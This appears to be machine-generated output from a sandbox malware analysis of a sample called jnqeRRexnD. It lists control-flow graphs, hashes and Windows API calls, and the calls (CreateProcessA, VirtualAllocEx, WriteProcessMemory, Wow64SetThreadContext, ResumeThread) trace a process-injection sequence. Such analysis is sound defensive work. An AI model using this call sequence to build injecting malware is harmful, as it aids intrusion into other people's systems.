                                                                                                              • Instruction ID: 7501a83a89aef63a6859fd7ab6c48e344ca0e33e98864b3f0bcea4ba9001bebc
                                                                                                              • Opcode Fuzzy Hash: f3002f82535b532d048bb5367861cd8f6228869c2f7a6c001ff89ac1eade7a6f
                                                                                                              • Instruction Fuzzy Hash: 82A18971D007298FDF60CFA8C941BEEBBF2BB48310F1485A9E808A7240DB759985CF91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 588 69a7f70-69a8005 590 69a803e-69a805e 588->590 591 69a8007-69a8011 588->591 598 69a8060-69a806a 590->598 599 69a8097-69a80c6 590->599 591->590 592 69a8013-69a8015 591->592 593 69a8038-69a803b 592->593 594 69a8017-69a8021 592->594 593->590 596 69a8023 594->596 597 69a8025-69a8034 594->597 596->597 597->597 600 69a8036 597->600 598->599 601 69a806c-69a806e 598->601 605 69a80c8-69a80d2 599->605 606 69a80ff-69a81b9 CreateProcessA 599->606 600->593 603 69a8070-69a807a 601->603 604 69a8091-69a8094 601->604 607 69a807e-69a808d 603->607 608 69a807c 603->608 604->599 605->606 610 69a80d4-69a80d6 605->610 619 69a81bb-69a81c1 606->619 620 69a81c2-69a8248 606->620 607->607 609 69a808f 607->609 608->607 609->604 611 69a80d8-69a80e2 610->611 612 69a80f9-69a80fc 610->612 614 69a80e6-69a80f5 611->614 615 69a80e4 611->615 612->606 614->614 617 69a80f7 614->617 615->614 617->612 619->620 630 69a824a-69a824e 620->630 631 69a8258-69a825c 620->631 630->631 632 69a8250 630->632 633 69a825e-69a8262 631->633 634 69a826c-69a8270 631->634 632->631 633->634 635 69a8264 633->635 636 69a8272-69a8276 634->636 637 69a8280-69a8284 634->637 635->634 636->637 638 69a8278 636->638 639 69a8296-69a829d 637->639 640 69a8286-69a828c 637->640 638->637 641 69a829f-69a82ae 639->641 642 69a82b4 639->642 640->639 641->642 644 69a82b5 642->644 644->644
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A81A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 742eaf1824b690b15485dcbba5a681787529c8be764d5ff653c226278ae44c41
                                                                                                              • Instruction ID: c7e09a3af3a7f706c8a322876397e7dc1920f396ec8cff03af17d82932bf9ed1
                                                                                                              • Opcode Fuzzy Hash: 742eaf1824b690b15485dcbba5a681787529c8be764d5ff653c226278ae44c41
                                                                                                              • Instruction Fuzzy Hash: 10917971D007298FDF64DFA8C9417EEBAF2BB48310F1485A9E808A7640DB759985CF91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 645 bdad08-bdad17 646 bdad19-bdad26 call bda02c 645->646 647 bdad43-bdad47 645->647 652 bdad3c 646->652 653 bdad28 646->653 648 bdad49-bdad53 647->648 649 bdad5b-bdad9c 647->649 648->649 656 bdad9e-bdada6 649->656 657 bdada9-bdadb7 649->657 652->647 702 bdad2e call bdafa0 653->702 703 bdad2e call bdaf90 653->703 656->657 659 bdadb9-bdadbe 657->659 660 bdaddb-bdaddd 657->660 658 bdad34-bdad36 658->652 661 bdae78-bdaf38 658->661 663 bdadc9 659->663 664 bdadc0-bdadc7 call bda038 659->664 662 bdade0-bdade7 660->662 695 bdaf3a-bdaf3d 661->695 696 bdaf40-bdaf6b GetModuleHandleW 661->696 667 bdade9-bdadf1 662->667 668 bdadf4-bdadfb 662->668 666 bdadcb-bdadd9 663->666 664->666 666->662 667->668 670 bdadfd-bdae05 668->670 671 bdae08-bdae11 call bda048 668->671 670->671 676 bdae1e-bdae23 671->676 677 bdae13-bdae1b 671->677 678 bdae25-bdae2c 676->678 679 bdae41-bdae45 676->679 677->676 678->679 681 bdae2e-bdae3e call bda058 call bda068 678->681 700 bdae48 call bdb2a0 679->700 701 bdae48 call bdb270 679->701 681->679 682 bdae4b-bdae4e 685 bdae71-bdae77 682->685 686 bdae50-bdae6e 682->686 686->685 695->696 697 bdaf6d-bdaf73 696->697 698 bdaf74-bdaf88 696->698 697->698 700->682 701->682 702->658 703->658
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00BDAF5E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 4f50effd043e975711296cc95a700878e963aa66b966b6c6ad48cf7b96c2bd0a
                                                                                                              • Instruction ID: 8c6f0f119dbe7976b98aa89bc9b1594b19e10057f372bc7d1e9acc582b14da30
                                                                                                              • Opcode Fuzzy Hash: 4f50effd043e975711296cc95a700878e963aa66b966b6c6ad48cf7b96c2bd0a
                                                                                                              • Instruction Fuzzy Hash: 7F7122B0A00B058FD724DF29C04175ABBF6FF88304F10896AE49AD7B50E774E949CB92

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 704 bd58ec-bd596c 706 bd596f-bd59b9 CreateActCtxA 704->706 708 bd59bb-bd59c1 706->708 709 bd59c2-bd5a1c 706->709 708->709 716 bd5a1e-bd5a21 709->716 717 bd5a2b-bd5a2f 709->717 716->717 718 bd5a31-bd5a3d 717->718 719 bd5a40 717->719 718->719 720 bd5a41 719->720 720->720
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00BD59A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 60b5563763407bbe817bf8243e98e672740f1ffb00e3645c3c62792089155314
                                                                                                              • Instruction ID: 5b9740f78e8e67e61f32ffc02183326343624fd054b4af82da91a5a83bf423f5
                                                                                                              • Opcode Fuzzy Hash: 60b5563763407bbe817bf8243e98e672740f1ffb00e3645c3c62792089155314
                                                                                                              • Instruction Fuzzy Hash: 6A41D1B0C00A19CBDB24DFA9C984B8DFBF6FF48314F20815AD408AB251DB756946CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 722 bd5a64-bd5af4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 689fd002d22737bf2d5a9a78e4434a19d8563214eb4feb7920debb724448456e
                                                                                                              • Instruction ID: 3d47a42024e178736e55e01ece715ac1baf23e338849942168b60b7f7b6da151
                                                                                                              • Opcode Fuzzy Hash: 689fd002d22737bf2d5a9a78e4434a19d8563214eb4feb7920debb724448456e
                                                                                                              • Instruction Fuzzy Hash: BE31EDB5804A58CFDF21CFA8C8847DEFBF1EF56314F14828AC005AB252D739A94ACB41

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 725 bd44b0-bd59b9 CreateActCtxA 729 bd59bb-bd59c1 725->729 730 bd59c2-bd5a1c 725->730 729->730 737 bd5a1e-bd5a21 730->737 738 bd5a2b-bd5a2f 730->738 737->738 739 bd5a31-bd5a3d 738->739 740 bd5a40 738->740 739->740 741 bd5a41 740->741 741->741
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 00BD59A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 1db18446c88bae9238ab402acd71a508975c3785ed30d70fe34ccbac3b44f029
                                                                                                              • Instruction ID: 716d2a699804e32492be805b0057782c15969a5b0ff400e05a0662b0ccd0e8fc
                                                                                                              • Opcode Fuzzy Hash: 1db18446c88bae9238ab402acd71a508975c3785ed30d70fe34ccbac3b44f029
                                                                                                              • Instruction Fuzzy Hash: 4D41AFB0C00619CBDB24DFA9C984B9EBBF6FF49304F20856AD408AB251DB756945CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 743 69a7ce0-69a7d36 746 69a7d38-69a7d44 743->746 747 69a7d46-69a7d85 WriteProcessMemory 743->747 746->747 749 69a7d8e-69a7dbe 747->749 750 69a7d87-69a7d8d 747->750 750->749
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A7D78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 31c29bbc06f55478f05f42abea23db1f3fac8d18fbb2e84a137c6d93b9b1bdfd
                                                                                                              • Instruction ID: 70e22cfd227aec2616dcd1741768dad5ab416a67b055e079dde5c3c209614440
                                                                                                              • Opcode Fuzzy Hash: 31c29bbc06f55478f05f42abea23db1f3fac8d18fbb2e84a137c6d93b9b1bdfd
                                                                                                              • Instruction Fuzzy Hash: B52128B5D003499FCB10CFA9C985BEEBBF5FF48320F10842AE519A7250D7789954DBA1
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A7D78
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: cc1ee3e57f60abb12124a16e50e959c7093a0c6869cb745cf3d60a7dd94d1c84
                                                                                                              • Instruction ID: bdd6df3e13afcf42cf53eff07ce5c21da232fd0b72b75ca5d208e707b9f5e866
                                                                                                              • Opcode Fuzzy Hash: cc1ee3e57f60abb12124a16e50e959c7093a0c6869cb745cf3d60a7dd94d1c84
                                                                                                              • Instruction Fuzzy Hash: DF2127B5D003499FCB10CFA9C985BEEBBF5FF48320F10842AE919A7250D7789944DBA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 754 69a7b48-69a7b9b 757 69a7bab-69a7bdb Wow64SetThreadContext 754->757 758 69a7b9d-69a7ba9 754->758 760 69a7bdd-69a7be3 757->760 761 69a7be4-69a7c14 757->761 758->757 760->761
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A7BCE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 7f7a0aead74f5c8c121533437c5ffe91b9ff40252efcf5dcea73f2b4b9e24c7e
                                                                                                              • Instruction ID: 975b7e2ce18da0597fa4ea50a8e79506ac9c71af69634889a9cbb619a9ccac03
                                                                                                              • Opcode Fuzzy Hash: 7f7a0aead74f5c8c121533437c5ffe91b9ff40252efcf5dcea73f2b4b9e24c7e
                                                                                                              • Instruction Fuzzy Hash: 9F214AB1D003099FDB10DFAAC485BEFBBF4EF48324F10842AD419A7240C7789545CBA0
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A7E58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 200f993d768f68bbd1ae37d1e877a22ba47c93302e3e4ee5d00a1da606f80b6a
                                                                                                              • Instruction ID: d79e531deefd32dec423554fa5d373ffc591559e3ca4363b3c4af778f05f37f9
                                                                                                              • Opcode Fuzzy Hash: 200f993d768f68bbd1ae37d1e877a22ba47c93302e3e4ee5d00a1da606f80b6a
                                                                                                              • Instruction Fuzzy Hash: A02119B1D003599FCB10DFAAC881AEEBBF5FF48320F20842AE519A7250C7759955DBA1
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BDD677
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: d4b0212073fb9946422c62ee1575e02197a567b29150cf9b65cb6d02bb8f9df1
                                                                                                              • Instruction ID: fb60ce5d4dc9c3cac22c00c83b4869e1d9f4c7299800c82c2f6d0189819623d4
                                                                                                              • Opcode Fuzzy Hash: d4b0212073fb9946422c62ee1575e02197a567b29150cf9b65cb6d02bb8f9df1
                                                                                                              • Instruction Fuzzy Hash: AA2105B59002089FDB10CFAAD484ADEFFF5EB48320F14801AE918A3310D374A940DFA0
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A7E58
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              • Opcode ID: 9ab4689afcb1407ffb7aad77f4ced6669211f7344bd55a1f20ddbdd3fe86b3eb
                                                                                                              • Instruction ID: a6cb26ca8812060cd22f339c7fd8a1f1cbb623f60dee1b2a41b25512e0c1990a
                                                                                                              • Opcode Fuzzy Hash: 9ab4689afcb1407ffb7aad77f4ced6669211f7344bd55a1f20ddbdd3fe86b3eb
                                                                                                              • Instruction Fuzzy Hash: AA213CB1C003499FCB10DFAAC841AEEFBF5FF48320F10842AE519A7250C7749900DBA0
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A7BCE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 65fa8a123735f4655972994caa02865d95f21112b1013adaf2c7a5d5d669d454
                                                                                                              • Instruction ID: b6cd517d4f3f82a59cbe3a41b071214fa605d5b070e1c6852ab0ffe636bf8299
                                                                                                              • Opcode Fuzzy Hash: 65fa8a123735f4655972994caa02865d95f21112b1013adaf2c7a5d5d669d454
                                                                                                              • Instruction Fuzzy Hash: A72107B5D003098FDB50DFAAC485BAEBBF5EF88324F14842AD519A7240C778A945CBA1
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BDD677
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: d1b81f3b909fd6d3cce6a8d01950647becf53121f6bfac67982d51c47f1dd584
                                                                                                              • Instruction ID: f621ae16d4440af416552c01ffe905ef7b9765884dbd31f45f54427737e74a55
                                                                                                              • Opcode Fuzzy Hash: d1b81f3b909fd6d3cce6a8d01950647becf53121f6bfac67982d51c47f1dd584
                                                                                                              • Instruction Fuzzy Hash: 9121E6B5D002089FDB10CF9AD584ADEFBF5FB48320F14841AE918A3350D374A940DFA4
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A7C96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 902bc345201cc8e2a7710108e89cfebdf80a37190585418f87b60343c42d66b7
                                                                                                              • Instruction ID: 40d9559efadd33dc8772489e5d438b1b7bcda8327a39ad61059aaebd4ac88e85
                                                                                                              • Opcode Fuzzy Hash: 902bc345201cc8e2a7710108e89cfebdf80a37190585418f87b60343c42d66b7
                                                                                                              • Instruction Fuzzy Hash: 301147769003499FCB20DFAAC845ADFBFF9EF48320F20841AE519AB250C7759545DFA0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 994dafcf4c4fbf5c880fb1a8c506a2d8db168f709d4a5c6426ab8710aa0f8f14
                                                                                                              • Instruction ID: c84352c6d0c52e9136ee378f5ee2bf99bc3daeed90ca4165cb6962efc5ec0cf5
                                                                                                              • Opcode Fuzzy Hash: 994dafcf4c4fbf5c880fb1a8c506a2d8db168f709d4a5c6426ab8710aa0f8f14
                                                                                                              • Instruction Fuzzy Hash: 27114CB5D003499BCB10DFAAC845BDFFBF9AF48324F20841AD419A7340C7755544CBA0
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069A7C96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: f3f2008242323988b66ff44bbf15cab06ee3a8a1acbfffa9290125ffcf7f7332
                                                                                                              • Instruction ID: 4c687382d3063f7c3d663f9af26bdc813a0a15b780a1b69ac22f46704770ba51
                                                                                                              • Opcode Fuzzy Hash: f3f2008242323988b66ff44bbf15cab06ee3a8a1acbfffa9290125ffcf7f7332
                                                                                                              • Instruction Fuzzy Hash: 03113A759003499FCF10DFAAC845ADEBFF5EF48320F248419E519A7250C7759540DFA0
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 069AB5FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: df6fe67315aa0a27d85401b41b06505037300f2b98285c2c6023e75da1bdd558
                                                                                                              • Instruction ID: ea08b16adb8b77c0c046a61bf6313407d125f211bea047767934ccda99263b14
                                                                                                              • Opcode Fuzzy Hash: df6fe67315aa0a27d85401b41b06505037300f2b98285c2c6023e75da1bdd558
                                                                                                              • Instruction Fuzzy Hash: 7B1125B58013499FCB10CF9AD885BDEBFF8EB48324F20841AE514A7700C375A544CFA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: 04535100f15c7cb684c6bc93bfdb17a07bcbca27f8e234bfd0f770055162e666
                                                                                                              • Instruction ID: e1b28b3a4e7c1c25522b035b0994b1b8fd648bd0bc5afbe1a08071f172a85492
                                                                                                              • Opcode Fuzzy Hash: 04535100f15c7cb684c6bc93bfdb17a07bcbca27f8e234bfd0f770055162e666
                                                                                                              • Instruction Fuzzy Hash: 911128B1D003498BDB20DFAAC44579EFBF9AB88324F24841AD519A7240C6756944CBA0
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 069AB5FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 8c4da210fc05877bfcacd836c0e0c0fbb62ea13a1f3406e9f44523ff3e0708ca
                                                                                                              • Instruction ID: 769a6d9b1bfa854ba522416c401d07c3f67e5e069c2a078ad572596698032cc7
                                                                                                              • Opcode Fuzzy Hash: 8c4da210fc05877bfcacd836c0e0c0fbb62ea13a1f3406e9f44523ff3e0708ca
                                                                                                              • Instruction Fuzzy Hash: 8E1122B58003489FDB60DF9AC984BDEBBF8EB48324F20841AE518A3700C374A940CFA0
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00BDAF5E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: 718cfbb2f0f3a29deef9c308a44972754ad65e91149b6608962e9c4fbcde9186
                                                                                                              • Instruction ID: 51d62e88d132b1565025809e685e4c2d220162cd6c6ee260c92a2efa4b4d9afc
                                                                                                              • Opcode Fuzzy Hash: 718cfbb2f0f3a29deef9c308a44972754ad65e91149b6608962e9c4fbcde9186
                                                                                                              • Instruction Fuzzy Hash: F311DFB6C002498FCB10CF9AC444A9EFBF9EB88324F24849AD419A7710D379A545CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 790c982d2b04af839e3c984dd6d087cb8a27076d254bfd0d83918c65ba84027e
                                                                                                              • Instruction ID: c32aeb87739e4f06214723aab947bd5bc9758c738b27c00665566fd64f5f2441
                                                                                                              • Opcode Fuzzy Hash: 790c982d2b04af839e3c984dd6d087cb8a27076d254bfd0d83918c65ba84027e
                                                                                                              • Instruction Fuzzy Hash: 4B21F1B2A04304DFCB05DF14D9D0B26BB66FB88314F24C569ED098B346C336E856DBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_86d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
                                                                                                              • Instruction ID: 9d59c89a8d5c81e659841f8cb86e98c1b34293b95c808b3d1bc9cc6dedeac98f
                                                                                                              • Opcode Fuzzy Hash: 327fe3ad16814b916fa8910def7d1c38ce3846d4b9845a3a6c73ab314e8989d4
                                                                                                              • Instruction Fuzzy Hash: 592124B1A04344DFCB04DF04C9C0F26BB65FB98324F24C569E9098B256C736E846CAA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
                                                                                                              • Instruction ID: fe3760ee03ae2393a5acca8f24bf84e567e2f6ffe1660ca89f267ca49eea59a2
                                                                                                              • Opcode Fuzzy Hash: 6afd2274d96a6342ec727db2b4500157338c0690d7d2186c57fff607aa5e1007
                                                                                                              • Instruction Fuzzy Hash: FB21C1B1614304AFDB05DF14D5C0B26BB75FF84318F24C569E94D8B25AC336E846DA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159137655.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_87d000_jnqeRRexnD.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
                                                                                                              • Instruction ID: 0b82cf37dc8daf5d671f23dc148e5965e2728fc8ebbf669c05d3024cc63fe816
                                                                                                              • Opcode Fuzzy Hash: 0d8cf38cc275b897b956dbecc290130fe5616cfc98415d5e3a993d9e92d7891e
                                                                                                              • Instruction Fuzzy Hash: A221CFB56047049FCB14DF14D980B26BB75FB84318F24C969E90E8B29AC33AD847CA61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2159028242.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
